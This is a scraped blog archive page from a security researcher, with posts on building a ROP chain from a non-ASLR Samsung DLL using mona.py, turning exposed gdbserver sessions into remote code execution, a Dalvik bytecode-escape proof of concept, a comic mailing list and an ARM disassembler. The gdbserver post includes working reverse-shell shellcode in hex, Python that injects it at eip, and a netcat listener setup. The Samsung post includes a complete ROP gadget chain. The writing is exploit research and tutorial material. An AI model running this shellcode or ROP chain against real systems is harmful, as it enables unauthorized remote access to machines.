hrefhttp://avira.com/>Avira/a> and a special thanks tobr />a hrefhttp://avira.com/>Avira/a> and the a hrefhttp://www.ites-project.org/index_en.html>iTES Project/a> for supporting the development ofbr />this tool./p>p>So much for today! Hope the tool will be useful for people and if there arebr />any questions don’t hesitate to email me or so./p>p>ps: Please don’t tell me about using strong>vagrant/strong> or similar instead ofbr />something custom built unless you’ve actually used it together with Cuckoo img srchttp://jbremer.org/wp-includes/images/smilies/icon_razz.gif alt:P classwp-smiley /> /p> /div>!-- .entry-content --> footer classentry-meta> span classcat-links> span classentry-utility-prep entry-utility-prep-cat-links>Posted in/span> a hrefhttp://jbremer.org/category/uncategorized/ titleView all posts in Uncategorized relcategory tag>Uncategorized/a> /span> span classsep> | /span> span classcomments-link>a hrefhttp://jbremer.org/vmcloak/#comments titleComment on VMCloak: Automated Virtual Machine Generation and Cloaking for Cuckoo Sandbox>b>2/b> Replies/a>/span> /footer>!-- #entry-meta --> /article>!-- #post-214 --> article idpost-209 classpost-209 post type-post status-publish format-standard hentry category-uncategorized> header classentry-header> h1 classentry-title>a hrefhttp://jbremer.org/mona-101-a-global-samsung-dll/ titlePermalink to Mona 101: a Global Samsung DLL relbookmark>Mona 101: a Global Samsung DLL/a>/h1> div classentry-meta> span classsep>Posted on /span>a hrefhttp://jbremer.org/mona-101-a-global-samsung-dll/ title3:06 am relbookmark>time classentry-date datetime2013-12-08T03:06:19+00:00 pubdate>December 8, 2013/time>/a>span classby-author> span classsep> by /span> span classauthor vcard>a classurl fn n hrefhttp://jbremer.org/author/jbremer/ titleView all posts by jbremer relauthor>jbremer/a>/span>/span> /div>!-- .entry-meta --> div classcomments-link> a hrefhttp://jbremer.org/mona-101-a-global-samsung-dll/#comments titleComment on Mona 101: a Global Samsung DLL>1/a> /div> /header>!-- .entry-header --> div classentry-content> style>li p { margin: 0; padding: 0;}/* undo stupid brs by wordpress */br { display: none;}/style>h1>Mona 101: a Global Samsung DLL/h1>p>This blogpost will be just another 101 for a hrefhttp://redmine.corelan.be/projects/mona>mona.py/a>. There’s already abr />good introduction to / full documentation of mona a hrefhttps://www.corelan.be/index.php/2011/07/14/mona-py-the-manual/>here/a>, includingbr />setting it up and running it for the first time. (Which is surprisingly easy,br />at least with Immunity Debugger – I haven’t tested mona with WinDBG.)/p>h1>Our target/h1>p>Well, it turns out that a dll called strong>WinCRT.dll/strong>, developed by Samsung andbr />distributed by default on at least a set of Samsung laptops, isbr />being loaded in every process that imports strong>user32.dll/strong> on my system.. Yay!br />Needless to say it doesn’t have em>ASLR/em> enabled, nor does it rebase by default.br />If you haven’t guessed its base address by now, then I’ll give you a hint;br />0×10000000. A copy of the DLL can be found a href/wp-posts/samsung-wincrt.dll>here/a> – naturally I’m notbr />responsible for whatever you do with it :p/p>p>Btw, the path of this Samsung DLL is:br />strong>C:\Program Files (x86)\Samsung\Movie Color Enhancer\WinCRT.dll/strong>/p>h1>Generate some ROP/h1>p>After running any program which imports user32, such as the followingbr />MessageBox() program, we attach Immunity Debugger to it./p>p>pre classbrush: cpp; title: ; notranslate title>#include <windows.h>int main(){ MessageBoxA(NULL, "Hello Samsung!", ":-)", 0);}/pre>/p>p>We run the following command and get our ROP chain after roughly 10 seconds:/p>p>pre classbrush: bash; title: ; notranslate title>!mona rop -m wincrt -rva/pre>/p>p>As documented in the tutorials that were linked earlier in this blogpost, thebr />strong>-m/strong> switch specifies the module to search, and strong>-rva/strong> gives a dump withbr />relative addresses to the base address. (In case you need an infoleak tobr />obtain the base address of your target module, rather than having a DLL that’sbr />being loaded on a static address.)/p>p>The ROP chain returned may look like the following, including some commentsbr />about what the registers should look like at the point that em>VirtualAlloc/em> isbr />invoked./p>p>pre classbrush: python; title: ; notranslate title>"""Register setup for VirtualAlloc() : EAX NOP (0x90909090) ECX flProtect (0x40) EDX flAllocationType (0x1000) EBX dwSize ESP lpAddress (automatic) EBP ReturnTo (ptr to jmp esp) ESI ptr to VirtualAlloc() EDI ROP NOP (RETN)"""def create_rop_chain(base_wincrt): # rop chain generated with mona.py rop_gadgets base_wincrt + 0x0000f128, # POP EAX # POP EBP # RETN WinCRT.dll base_wincrt + 0x0001f0a8, # ptr to &VirtualAlloc() IAT WinCRT.dll 0x41414141, # Filler (compensate) base_wincrt + 0x00005bff, # MOV EAX,DWORD PTR DS:EAX # ADD CL,CL # RETN 0x08 WinCRT.dll base_wincrt + 0x0000431d, # PUSH EAX # ADD AL,5F # POP ESI # RETN WinCRT.dll 0x41414141, # Filler (RETN offset compensation) 0x41414141, # Filler (RETN offset compensation) base_wincrt + 0x0001a14e, # POP EBP # RETN WinCRT.dll 0x00000000, # & base_wincrt + 0x0000bd5b, # POP EBX # RETN WinCRT.dll 0x00000001, # 0x00000001-> ebx base_wincrt + 0x00005209, # POP EBX # RETN WinCRT.dll 0x00001000, # 0x00001000-> edx base_wincrt + 0x0001183c, # XOR EDX,EDX # RETN WinCRT.dll base_wincrt + 0x0001175e, # ADD EDX,EBX # POP EBX # RETN 0x10 WinCRT.dll 0x41414141, # Filler (compensate) base_wincrt + 0x000191b8, # POP ECX # RETN WinCRT.dll 0x41414141, # Filler (RETN offset compensation) 0x41414141, # Filler (RETN offset compensation) 0x41414141, # Filler (RETN offset compensation) 0x41414141, # Filler (RETN offset compensation) 0x00000040, # 0x00000040-> ecx base_wincrt + 0x0000f203, # POP EDI # RETN WinCRT.dll base_wincrt + 0x0000f204, # RETN (ROP NOP) WinCRT.dll base_wincrt + 0x0000f128, # POP EAX # POP EBP # RETN WinCRT.dll 0x90909090, # nop 0x41414141, # Filler (compensate) base_wincrt + 0x0000c27e, # PUSHAD # ADD AL,0 # RETN WinCRT.dll return .join(struct.pack(<I, _) for _ in rop_gadgets)# WinCRT.dll ASLR: False, Rebase: False, SafeSEH: True, OS: False, v0.0.0.1 (C:\Program Files (x86)\Samsung\Movie Color Enhancer\WinCRT.dll)base_wincrt 0x10000000rop_chain create_rop_chain(base_wincrt)/pre>/p>h1>Fixing the ROP chain/h1>p>Unfortunately mona makes some small mistakes, but that’s why it gives greatbr />feedback in the form of a href/wp-posts/samsung-rop.txt>em>rop.txt/em>/a> and a href/wp-posts/samsung-rop_suggestions.txt>em>rop_suggestions.txt/em>/a>./p>p>Now if you look closely at the generated ROP chain, while comparing them tobr />the notes about the required states of the registers for VirtualAlloc, thenbr />you’ll notice that some gadgets have to be shuffled around, and some are notbr />correct yet./p>p>Let’s analyze each register top-to-bottom from the provided register list inbr />order to see if they’re all set correctly. First we start with em>eax/em>./p>p>Eax is set to 0×90909090 at the end. However, it also sets em>ebp/em> to an invalidbr />value – register dependencies is something that mona doesn’t handle verybr />well yet, unfortunately. Anyway, it’s easier to replace this gadget than tobr />shuffle it around. I ended up replacing it by a “pop ecx ; retn” andbr />“mov eax, ecx ; retn” gadget, and moving it to an earlier place in the ROPbr />chain where ecx hasbr />not yet been assigned its final value. Ecx itself is already correct, it’ll bebr />set to 0×40 using the ‘original’ “pop ecx ; retn” gadget./p>p>Edx has to become 0×1000, for which mona has decided to use em>ebx/em> asbr />intermediate register. We can remove the first gadget that sets ebx, as itsbr />value is overwritten right away when executing the next gadget. (Which setsbr />ebx as well.)/p>p>Now mona handles em>esp/em> for us, so we don’t have to do anything there. The nextbr />register, em>ebp/em>, however, does need some extra work. The description tells usbr />it needs to point to a “jmp esp” gadget, but because there’s no such gadget inbr />our DLL mona sort of failed silently. (The comment doesn’t show an errorbr />message, but instead shows something that doesn’t make much sense.)/p>p>Given there’s no “jmp esp” in our code, nor a direct “push esp ; retn” gadget,br />we have to play around with mona some more.. We run the following commandbr />which is, again, documented a hrefhttps://www.corelan.be/index.php/2011/07/14/mona-py-the-manual/>here/a>, and find the following gadget./p>p>pre classbrush: bash; title: ; notranslate title>!mona findwild -s "push esp#*#retn" -m wincrt0x10009558: push esp # add al,2 # adc bl,al # xor eax,eax # retn WinCRT.dll/pre>/p>h1>Finishing up/h1>p>So yeah, that’ll do for us img srchttp://jbremer.org/wp-includes/images/smilies/icon_smile.gif alt:) classwp-smiley /> Patch the 0×00000000 value withbr />“base_wincrt + 0×00009558″ and em>ebp/em> is good to go. Finally, em>esi/em> and em>edi/em>br />have been handled correctly by mona. (Note that we don’t have to worry aboutbr />the value of eax in our custom “jmp esp” gadget, as this is executed rightbr />after the call to VirtualAlloc, and literally jumps to our shellcode.)/p>p>Having fixed the ROP chain, our final ROP chain including some MessageBox()br />shellcode, wrapped into a C file looks like a href/wp-posts/samsung.c>the following/a>. (Woah,br />somebody added C dumping support to mona yesterday!) In case you’re interestedbr />in the binary, to be ran when the DLL is loaded into memory, it can be foundbr />a href/wp-posts/samsung.exe>here/a>./p>h1>Conclusion/h1>p>This was the first time I tried mona and I’m genuinely happy about it. Verybr />easy to use and it did the job for me img srchttp://jbremer.org/wp-includes/images/smilies/icon_smile.gif alt:) classwp-smiley /> Ah yeah, so anyone with thisbr />particular Samsung software on his computer.. how do I even.. I guess it’sbr />just “another one of those”./p> /div>!-- .entry-content --> footer classentry-meta> span classcat-links> span classentry-utility-prep entry-utility-prep-cat-links>Posted in/span> a hrefhttp://jbremer.org/category/uncategorized/ titleView all posts in Uncategorized relcategory tag>Uncategorized/a> /span> span classsep> | /span> span classcomments-link>a hrefhttp://jbremer.org/mona-101-a-global-samsung-dll/#comments titleComment on Mona 101: a Global Samsung DLL>b>1/b> Reply/a>/span> /footer>!-- #entry-meta --> /article>!-- #post-209 --> article idpost-206 classpost-206 post type-post status-publish format-standard hentry category-uncategorized> header classentry-header> h1 classentry-title>a hrefhttp://jbremer.org/turning-arbitrary-gdbserver-sessions-into-rce/ titlePermalink to Turning arbitrary GDBserver sessions into RCE relbookmark>Turning arbitrary GDBserver sessions into RCE/a>/h1> div classentry-meta> span classsep>Posted on /span>a hrefhttp://jbremer.org/turning-arbitrary-gdbserver-sessions-into-rce/ title11:45 am relbookmark>time classentry-date datetime2013-12-02T11:45:03+00:00 pubdate>December 2, 2013/time>/a>span classby-author> span classsep> by /span> span classauthor vcard>a classurl fn n hrefhttp://jbremer.org/author/jbremer/ titleView all posts by jbremer relauthor>jbremer/a>/span>/span> /div>!-- .entry-meta --> div classcomments-link> a hrefhttp://jbremer.org/turning-arbitrary-gdbserver-sessions-into-rce/#respond titleComment on Turning arbitrary GDBserver sessions into RCE>span classleave-reply>Reply/span>/a> /div> /header>!-- .entry-header --> div classentry-content> style>li p { margin: 0; padding: 0;}/* undo stupid brs by wordpress */br { display: none;}/style>h1>Turning an arbitrary GDBserver sessions into RCE/h1>p>Today we’ll see how we can turn an arbitrary GDBserver remote debuggingbr />session into remote code execution. First of all, let’s assume gdbserver isbr />ran using the following command. We will also assume that the targetbr />architecture is Linux/x86, but you can port the technique to otherbr />architectures as needed./p>p>pre classbrush: bash; title: ; notranslate title>$ gdbserver --remote-debug 0.0.0.0:1337 ./some_unknown_binary/pre>/p>p>What happens is that gdbserver will serve as many remote debugging sessions asbr />possible while it’s running. That is, we can have as many remote debuggingbr />sessions as we like, until the gdbserver is killed (but only one at a time.)br />This makes sense, because if we are debugging a target, then we don’t want tobr />restart gdbserver every time we hit “run” in gdb./p>p>Let’s assume one were to run gdbserver in a screen, to prevent accidentalbr />connection resets resulting in losing the gdbserver session (assuming we’rebr />ssh’ing into a remote server.) Exactly this happened to me – I recently foundbr />out that there were still two (of my) gdbserver’s running in a screen frombr />when we were playing a CTF, almost em>two months/em> ago./p>p>Now anyone with the ip address and port number can attach to your gdbserver bybr />doing the following./p>p>pre classbrush: bash; title: ; notranslate title>$ gdb(gdb) target extended-remote host:portRemote debugging using host:port(gdb) run..Inferior 1 (process 42) exited normally/pre>/p>p>In order not to make the RCE not too easy, we’re going to assume that we don’tbr />have any symbols of the remote binaries, and that all addresses are ASLR’d. Inbr />other words, educational guessing of “main” is useless, and we won’t be ablebr />to do arbitrary function calls during debugging such as the following./p>p>pre classbrush: bash; title: ; notranslate title>(gdb) call system("/bin/sh")No symbol table is loaded. Use the "file" command./pre>/p>p>However, if we enter a breakpoint at an invalid address and run the debuggee,br />we get an error right before executing the very first instruction of thebr />process. This looks roughly like the following img srchttp://jbremer.org/wp-includes/images/smilies/icon_smile.gif alt:) classwp-smiley /> /p>p>pre classbrush: bash; title: ; notranslate title>(gdb) break *0Breakpoint 1 at 0x0(gdb) runStarting program:warning: Could not load vsyscall page because no executable was specifiedtry using the "file" command first.Warning:Cannot insert breakpoint 1.Error accessing memory address 0x0: Unknown error 18446744073709551615.(gdb) info reg eipeip 0xf7fe0850 0xf7fe0850/pre>/p>p>At this point the debuggee has been executed, and we’re able to inspect andbr />modify its state. We continue by removing our earlier breakpoint. Now it’sbr />time for the fun part./p>h2>Reverse Shell Shellcode/h2>p>After a bit of googling, I stumbled upon the a hrefhttp://www.exploit-db.com/exploits/25497/>following shellcode/a>. Thisbr />shellcode connects to an ip address and port of your choosing, and executesbr />/bin/sh with stdin, stdout, and stderr set to your socket. If we have netcatbr />listening on the remote ip address and port, then it’ll get a connectionbr />request upon execution of the shellcode, and we can use it to run arbitrarybr />shell commands on the shellcodes machine, as if we had shell access. After anbr />initial test, this shellcode seemed to work on my x86_64 machine running abr />32-bit application. However, there’s a small problem with this shellcode. Ifbr />we look closely at the shellcode, we notice the following./p>p>pre classbrush: bash; title: ; notranslate title>804807b: 31 db xor ebx,ebx804807d: b3 02 mov bl,0x2..804808a: fe c3 inc bl..8048098: b1 03 mov cl,0x3804809a <dupfd>:804809a: fe c9 dec cl804809c: b0 3f mov al,0x3f804809e: cd 80 int 0x80 ; system call80480a0: 75 f8 jne 804809a/pre>/p>p>Investigating this system call further, we see that this is the a hrefhttp://syscalls.kernelgrok.com/>em>dup2/em>br />system call/a>. However, the ebx register, or em>old_fd/em>, seems to bebr />constant here – namely three. (I figured this out while brushing my teeth..)br />This is the default fd if you open your first file descriptor in a program,br />which is something we cannot assume, and is definitely not the case whenbr />running the debuggee under gdbserver. (E.g., this shellcode fails if you openbr />a file or socket before running it, because the fd of the socket allocated bybr />our shellcode will be four for example, instead of three.)/p>p>If we look further, we see that the esi register contains the fd numberbr />returned from the em>socket/em> system call. (Actually, this is the em>socketcall/em>br />system call with em>SOCKOP_socket/em> as operation, but that’s a minor detailbr />specific to Linux/x86.)/p>p>pre classbrush: bash; title: ; notranslate title>8048075: cd 80 int 0x80 ; socket()8048077: 89 c6 mov esi,eax ; esi fd..804808e: 6a 10 push 0x10 ; sizeof(sockaddr_in)8048090: 51 push ecx ; sockaddr_in *8048091: 56 push esi ; fd8048092: 89 e1 mov ecx,esp8048094: cd 80 int 0x80 ; connect()/pre>/p>p>Long story short, we want to preserve esi before the em>connect/em> system call,br />and store it into ebx after the system call. Thus ebx will contain the fd ofbr />our socket, and the system calls to em>dup2/em> will duplicate the correct fd intobr />stdin, stdout, and stderr. The following snippet shows the updates shellcode.br />This is the shellcode that we’re going to use./p>p>pre classbrush: bash; title: ; notranslate title>8048092: 89 e1 mov ecx,esp+ push esi ; push fd8048094: cd 80 int 0x80 ; connect()+ pop ebx ; pop fd into ebx8048096: 31 c9 xor ecx,ecx8048098: b1 03 mov cl,0x3/pre>/p>h2>Running the Shellcode/h2>p>All we have left to do is to patch the correct ip address and port into thebr />shellcode, namely that of our listening netcat instance (e.g., runningbr />“nc -vvv -l 9001″ on your favourite linux box), overwriting eip with thebr />shellcode, and finally, running it./p>p>For my exploit I’m using gdb’s Python bindings, as initially I had anotherbr />technique in mind, which required a bit more scripting. Following is thebr />final part of the code which generates the shellcode, overwrites it onto eip,br />and executes it. We have two em>continue/em> statements at the end, as thebr />shellcode will em>execv/em> into /bin/sh, after which we’ll get an error thatbr />gdbserver can’t read the memory of eip anymore, so we have to instructbr />gdbserver to continue past that error./p>p>pre classbrush: python; title: ; notranslate title>def reverse_shell((ip, port)): """Modified x86 reverse shell""" ip, port socket.inet_aton(ip), struct.pack(>H, port) sc \ 31c031db31c931d2b066b301516a066a016a0289e1cd8089c6b06631dbb30268 \ 000000006668ffff6653fec389e16a10515689e156cd805b31c9b103fec9b03f \ cd8075f831c052686e2f7368682f2f626989e3525389e15289e2b00bcd80 return sc.decode(hex).replace(\xff*2, port).replace(\x00*4, ip)for idx, ch in enumerate(reverse_shell(netcat)): gdb.execute(set *(unsigned char *)($eip + %d) %d % (idx, ord(ch)))gdb.execute(continue)gdb.execute(continue)/pre>/p>h2>Final Exploit/h2>p>The final exploit code can be found a hrefhttps://github.com/jbremer/gdbservrce>here/a>./p>p>Execution of the code may look like the following. We’ll need three shells.br />(Optionally on different servers – do as you like.)/p>h3>Shell 1/h3>p>pre classbrush: bash; title: ; notranslate title>$ gdbserver --remote-debug 0.0.0.0:1337 ./some_unknown_binary../pre>/p>h3>Shell 2/h3>p>pre classbrush: bash; title: ; notranslate title>$ nc -vvv -l 31338../pre>/p>h3>Shell 3/h3>p>pre classbrush: bash; title: ; notranslate title>$ vim gdbservrce.py # Patch the ip addresses$ gdb -x gdbservrce.py../pre>/p>h3>Enjoy Shell!/h3>p>Now if we go back to Shell #2, we’ll see the following, and can run arbitrarybr />shell commands./p>p>pre classbrush: bash; title: ; notranslate title>skier@box:~$ nc -vvv -l 31338Connection from 1.1.1.1 port 31338 tcp/* acceptediduid1010(skier) gid1011(skier) groups1011(skier)/pre>/p>h2>Conclusion/h2>p>This is a funny technique which basically tells you not to have gdbserver’sbr />running around img srchttp://jbremer.org/wp-includes/images/smilies/icon_smile.gif alt:) classwp-smiley /> /p> /div>!-- .entry-content --> footer classentry-meta> span classcat-links> span classentry-utility-prep entry-utility-prep-cat-links>Posted in/span> a hrefhttp://jbremer.org/category/uncategorized/ titleView all posts in Uncategorized relcategory tag>Uncategorized/a> /span> span classsep> | /span> span classcomments-link>a hrefhttp://jbremer.org/turning-arbitrary-gdbserver-sessions-into-rce/#respond titleComment on Turning arbitrary GDBserver sessions into RCE>span classleave-reply>Leave a reply/span>/a>/span> /footer>!-- #entry-meta --> /article>!-- #post-206 --> article idpost-200 classpost-200 post type-post status-publish format-standard hentry category-uncategorized> header classentry-header> h1 classentry-title>a hrefhttp://jbremer.org/dalvik-research/ titlePermalink to Dalvik Research relbookmark>Dalvik Research/a>/h1> div classentry-meta> span classsep>Posted on /span>a hrefhttp://jbremer.org/dalvik-research/ title12:17 pm relbookmark>time classentry-date datetime2013-10-23T12:17:41+00:00 pubdate>October 23, 2013/time>/a>span classby-author> span classsep> by /span> span classauthor vcard>a classurl fn n hrefhttp://jbremer.org/author/jbremer/ titleView all posts by jbremer relauthor>jbremer/a>/span>/span> /div>!-- .entry-meta --> div classcomments-link> a hrefhttp://jbremer.org/dalvik-research/#comments titleComment on Dalvik Research>2/a> /div> /header>!-- .entry-header --> div classentry-content> style>li p { margin: 0; padding: 0;}/* undo stupid brs by wordpress */br { display: none;}/style>h1>Dalvik Research/h1>p>Over the past couple of months I’ve been doing some research with regards tobr />the Dalvik Virtual Machine, which is Android’s Java Virtual Machinebr />implementation. Long story short, most Android applications are written inbr />Java, which gets compiled to Dalvik Bytecode, and ends up in an APK file (abr />Zip file.)/p>p>As part of my research on Dalvik, I analyzed both the Dalvik VM itself andbr />various applications – with a focus on their Obfuscation techniques (whichbr />makes analysis harder.) This research was presented on a couple ofbr />conferences./p>p>a hrefhttp://jbremer.org/automated-deobfuscation-of-android-applications/>Back in June/a> I already posted my slides for my a hrefhttp://athcon.org/>AthCon/a>br />talk, which focussed on Deobfuscation. Then a hrefhttps://twitter.com/rchiossi/status/386542792094519296>a couple of weeks ago/a>,br />I did a similar talk together with a hrefhttps://twitter.com/rchiossi>Rodrigo Chiossi/a> atbr />a hrefhttp://h2hc.com.br/h2hc/pt/>H2HC/a>, featuring new and updated content, with a bit more focus on somebr />of the techniques involved in creating new Dex files./p>p>Finally I did a a hrefhttp://2013.hack.lu/index.php/List#Jurriaan_Bremer_-_Abusing_Dalvik_Beyond_Recognition>talk/a> yesterday at a hrefhttp://2013.hack.lu/index.php/Main_Page>Hack.lu/a>, focussing on thebr />Dalvik Virtual Machine itself. In this talk I presented about anbr />em>“undocumented feature”/em> which I found in the way Android verifies Dex files,br />allowing an attacker to run arbitrary Dalvik Bytecode (which is normally notbr />allowed – all code must normally be hardcoded and will be verified uponbr />installation.) Following are the a href/wp-posts/AbusingDalvikBeyondRecognition.pdf>slides/a> and thebr />a href/wp-posts/DvmEscape.apk>Proof of Concept DvmEscape/a> application./p>p>As explained during the presentation, when running this application on yourbr />phone or emulator, you can type arbitrary Dalvik Bytecode and execute it bybr />clicking on the “Run Dalvik” button. On the 30th slide of the presentation onebr />can find two examples of valid Dalvik Bytecode, which, when ran, will returnbr />with a fancy number. Unfortunately the dalvik.py disassembler mentioned in thebr />slides is currently not open source, but for some more documentation on thebr />Dalvik Bytecode there’s always the a hrefhttp://source.android.com/devices/tech/dalvik/dalvik-bytecode.html>Dalvik Bytecode reference/a>./p>h1>Win32 Calc.exe Proof of Concept/h1>p>If you want to run my win32 calc.exe Proof of Concept from the presentationbr />you’ll have to do a couple of things:/p>ul>li>Install a href/wp-posts/CalcExe.apk>CalcExe.apk/a> on the device/li>li>Get the a href/wp-posts/adb_type.py>adb_type.py/a> script, which “types” a string intobr /> the emulator/li>li>Finally, type a href/wp-posts/payload.txt>payload.txt/a> to the em>DvmEscape/em> application, withbr /> the following command./li>/ul>p>pre classbrush: bash; title: ; notranslate title>$ python adb_type.py $(cat payload.txt) /pre>/p>p>Note that typing the bytecode in to the emulator (or phone?!) takes roughly abr />minute. (No, there appears to be no support for using the clipboard with thebr />emulator.) After that, just click on the button and calc should pop img srchttp://jbremer.org/wp-includes/images/smilies/icon_smile.gif alt:) classwp-smiley /> /p>p>For more information or questions, feel free to reach me at my new emailbr />address; a hrefmailto:me@jbremer.org>mail/a>./p> /div>!-- .entry-content --> footer classentry-meta> span classcat-links> span classentry-utility-prep entry-utility-prep-cat-links>Posted in/span> a hrefhttp://jbremer.org/category/uncategorized/ titleView all posts in Uncategorized relcategory tag>Uncategorized/a> /span> span classsep> | /span> span classcomments-link>a hrefhttp://jbremer.org/dalvik-research/#comments titleComment on Dalvik Research>b>2/b> Replies/a>/span> /footer>!-- #entry-meta --> /article>!-- #post-200 --> article idpost-194 classpost-194 post type-post status-publish format-standard hentry category-uncategorized> header classentry-header> h1 classentry-title>a hrefhttp://jbremer.org/dirkjan/ titlePermalink to Dirkjan Email Feed relbookmark>Dirkjan Email Feed/a>/h1> div classentry-meta> span classsep>Posted on /span>a hrefhttp://jbremer.org/dirkjan/ title12:23 am relbookmark>time classentry-date datetime2013-09-01T00:23:46+00:00 pubdate>September 1, 2013/time>/a>span classby-author> span classsep> by /span> span classauthor vcard>a classurl fn n hrefhttp://jbremer.org/author/jbremer/ titleView all posts by jbremer relauthor>jbremer/a>/span>/span> /div>!-- .entry-meta --> div classcomments-link> a hrefhttp://jbremer.org/dirkjan/#respond titleComment on Dirkjan Email Feed>span classleave-reply>Reply/span>/a> /div> /header>!-- .entry-header --> div classentry-content> style>li p { margin: 0; padding: 0;}/* undo stupid brs by wordpress */br { display: none;}/style>h1>Dirkjan Strip Mailing List/h1>p>This blogpost is mainly for strong>Dutch/strong> (speaking) people (although I’llbr />still keep the blogpost in English.) As I’m sure you’re all well-aware,br />Dirkjan is an a hrefhttp://en.wikipedia.org/wiki/DirkJan>awesome/a> Dutch a hrefhttp://nl.wikipedia.org/wiki/DirkJan>comic/a>./p>p>A couple of weeks ago I stumbled upon the a hrefhttp://www.veronicamagazine.nl/entertainment/strips>weekly feed/a> from strong>Veronica/strong>.br />Naturally, not wanting to check the website every week, I came up with a verybr />simple strong>Dirkjan Feed/strong> in the shape of a Mailing List. Of course this is notbr />so much a mailing list, as it’s mostly one-way traffic, but it’s a fun way tobr />keep up-to-date with strong>two Dirkjans a week/strong>!/p>h1>Subscribe/h1>p>Having said that, one can subscribe a hrefhttp://jbremer.org/mailman/listinfo/dirkjan_jbremer.org>here/a> simply by filling outbr />the strong>email address/strong>. Other information is optional and not very interesting.br />(Yes, the website is a bit ugly – it’s the default mailing list manager.)/p>p>By subscribing you agree to being awesome (given you’re interested in readingbr />Dirkjan) and the legal disclaimer on the bottom of this blogpost./p>h1>Subscription/h1>p>As I’ve only just set up the mailing list, I do not know exactly when newbr />comics will arrive, but it looks like it will be every Tuesday. Please, strong>whenbr />subscribed/strong>, do strong>not panic/strong> – the comics will come eventually! (Justbr />strong>wait/strong>!)/p>h1>Legal stuff/h1>p>I’m not affiliated with Veronica in any way. Any damage done through thisbr />Dirkjan Email Feed is at your own responsibility. I do not intendbr />to damage Veronica in any way./p>p>That’s all, and have fun reading Dirkjan. Dirkjan is awesome img srchttp://jbremer.org/wp-includes/images/smilies/icon_smile.gif alt:) classwp-smiley /> /p> /div>!-- .entry-content --> footer classentry-meta> span classcat-links> span classentry-utility-prep entry-utility-prep-cat-links>Posted in/span> a hrefhttp://jbremer.org/category/uncategorized/ titleView all posts in Uncategorized relcategory tag>Uncategorized/a> /span> span classsep> | /span> span classcomments-link>a hrefhttp://jbremer.org/dirkjan/#respond titleComment on Dirkjan Email Feed>span classleave-reply>Leave a reply/span>/a>/span> /footer>!-- #entry-meta --> /article>!-- #post-194 --> article idpost-189 classpost-189 post type-post status-publish format-standard hentry category-uncategorized> header classentry-header> h1 classentry-title>a hrefhttp://jbremer.org/darm-update-more-armv7-more-thumb/ titlePermalink to Darm Update – More ARMv7, More Thumb relbookmark>Darm Update – More ARMv7, More Thumb/a>/h1> div classentry-meta> span classsep>Posted on /span>a hrefhttp://jbremer.org/darm-update-more-armv7-more-thumb/ title12:04 pm relbookmark>time classentry-date datetime2013-08-16T12:04:53+00:00 pubdate>August 16, 2013/time>/a>span classby-author> span classsep> by /span> span classauthor vcard>a classurl fn n hrefhttp://jbremer.org/author/jbremer/ titleView all posts by jbremer relauthor>jbremer/a>/span>/span> /div>!-- .entry-meta --> div classcomments-link> a hrefhttp://jbremer.org/darm-update-more-armv7-more-thumb/#respond titleComment on Darm Update – More ARMv7, More Thumb>span classleave-reply>Reply/span>/a> /div> /header>!-- .entry-header --> div classentry-content> style>li p { margin: 0; padding: 0;}/* undo stupid brs by wordpress */br { display: none;}/style>h1>Darm Updates – More ARMv7, More Thumb/h1>p>Darm is an a hrefhttp://jbremer.org/darm>ARMv7/a> a hrefhttps://github.com/jbremer/darm>disassembler/a> in C. This blogpost is justbr />a small update about the new stuff in strong>darm/strong> from over the past couple ofbr />months, as there were some delays due to conferences and other stuff img srchttp://jbremer.org/wp-includes/images/smilies/icon_smile.gif alt:) classwp-smiley /> /p>h1>Thumb support/h1>p>Most notably, recently Darm has gained em>support/em> for the em>Thumb instruction/em>br />set. Those of you familiar with ARMv7 know ARMv7 has two modes, namely, ARMv7br />and Thumb. ARMv7 contains pretty much all the instructions you’d ever need,br />but Thumb is a small subset of the most used ARMv7 instructions and are onlybr />16 bits in size, whereas ARMv7 instructions are 32 bits in size. Needless tobr />say, Thumb allows for more compact code./p>p>The API to disassemble Thumb instructions is as straightforward as thebr />equivalent function for disassembling ARMv7 instructions. Furthermore, the twobr />instruction set modes share the same data structure, em>darm_t/em>, hence it isbr />easily possible to write generic analysis routines without having to worrybr />whether you’re analyzing ARMv7 or Thumb./p>p>Currently, the C API looks roughly like the following. (Including the Thumb2br />function, for more information on that, read further.)/p>p>pre classbrush: cpp; title: ; notranslate title>typedef struct _darm_t { ...} darm_t;// disassemble an armv7 instructionint darm_armv7_disasm(darm_t *d, uint32_t w);// disassemble a thumb instructionint darm_thumb_disasm(darm_t *d, uint16_t w);// disassemble a thumb2 instructionint darm_thumb2_disasm(darm_t *d, uint16_t w, uint16_t w2); /pre>/p>h1>ARMv7 Improvements and Bug Fixes/h1>p>ARMv7 has mostly had some bug fixes and a couple of new instructions. Nothingbr />too spectacular, but it’s still improving as I find bugs and stumble upon newbr />instructions./p>h1>Coming up: Thumb2 support/h1>p>Currently I’m working on getting support for the Thumb2 instruction set asbr />well. As the Thumb instruction set is fairly limited with regards to thebr />instruction that it can handle, as it’s only 16 bits in size, rather than 32br />bits, there’s also the Thumb2 extension. Thumb2 features almost all (exceptbr />for maybe a handful of instructions) of the instructions which are alsobr />available in the ARMv7 instruction set, hence allowing the optimized Thumbbr />instructions to be mixed with Thumb2 instructions, which are, as ARMv7, 32br />bits in size./p>p>Having said that, if there are requests for instructions which you’d like tobr />see sooner rather than later, please do contact me. At first I aim to support,br />let’s say, 90% of the binaries while keeping the amount of implementedbr />instructions to a “minimum.” That is, I’ll focus on the most used Thumb2br />instructions at first, and go for the complete instruction set later./p>h1>Difference between ARMv7 and Thumb/Thumb2/h1>p>A small explanation on ARMv7 vs Thumb/Thumb2./p>p>When executing ARM instructions, the instruction will be executed as ARMv7br />instruction whenever the address is 4-byte aligned, and executed as eitherbr />Thumb or Thumb2 instruction, depending on its encoding, when the lowestbr />significant bit is set. That is, when the address is not 4-byte aligned, butbr />instead either addr+1 or addr+3 (with addr being a 4-byte aligned pointer),br />then the instruction is decoded as being either Thumb or Thumb2./p>p>The instruction is either decoded as Thumb or Thumb2 depending on a couple ofbr />the most significant bits. When decoded as Thumb, one 16 bit word is fetchedbr />and executed. When decoded as Thumb2, a second 16 bit word is fetched and thebr />instruction is decoded as if it were a 32 bit word./p>p>At the a hrefhttps://github.com/jbremer/darm/blob/f43765295cc560727bc8edeb911c80a04d254e92/thumb.c#L311>following lines of code/a> we can see the comparison of thebr />upper 5 bits of the first 16 bit word. When the upper five bits equal eitherbr />b11101 (binary 11101, or 29 in decimal), b11110, or b11111, then it is abr />Thumb2 instruction. Otherwise it’s a Thumb instruction./p>p>Also note that at the moment there are two seperate functions to disassemblebr />Thumb and Thumb2 instructions, but don’t worry, in the future there’ll be abr />nice wrapper around them img 